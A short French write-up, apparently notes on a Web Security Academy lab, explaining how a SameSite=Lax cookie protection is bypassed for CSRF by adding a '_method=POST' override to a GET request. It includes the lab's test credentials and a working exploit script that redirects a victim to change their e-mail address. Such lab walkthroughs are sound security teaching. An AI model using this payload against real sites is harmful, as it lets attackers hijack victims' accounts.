Contournement SameSite=Lax via override de méthode

SameSite Lax bypass via method override

Lab: SameSite Lax bypass via method override | Web Security AcademyWebSecAcademy

La fonctionnalité de changement d’adresse e-mail du laboratoire est vulnérable à une attaque CSRF. Le site utilise SameSite=Lax, mais il est possible de contourner cette protection en forçant la requête en méthode POST via un paramètre d’override (&_method=POST) dans l’URL.

Objectif Héberger une charge (exploit) sur l’exploit server qui effectue une requête de changement d’e-mail au nom de la victime pour résoudre le lab.

Identifiants (compte test) wiener : peter

Une requête GET vers l’endpoint de changement d’e-mail renvoie que la méthode n’est pas autorisée.
L’ajout du paramètre &_method=POST dans l’URL fait accepter la requête (le site accepte l’override pour traiter la requête comme un POST), ce qui permet d’exécuter l’action malgré SameSite=Lax.

&_method=POST

Exploit serveur d’exploit

Le script suivant redirige la victime vers l’URL de changement d’e-mail en incluant le paramètre d’override pour forcer un POST :

<script>
  location="https://0af800380365a127808f0396006100a2.web-security-academy.net/my-account/change-email?email=hacked%40test.com&_method=POST";
</script>

Mis à jour il y a 4 mois

hashtagSameSite Lax bypass via method override

hashtagExploit serveur d’exploit

SameSite Lax bypass via method override

Exploit serveur d’exploit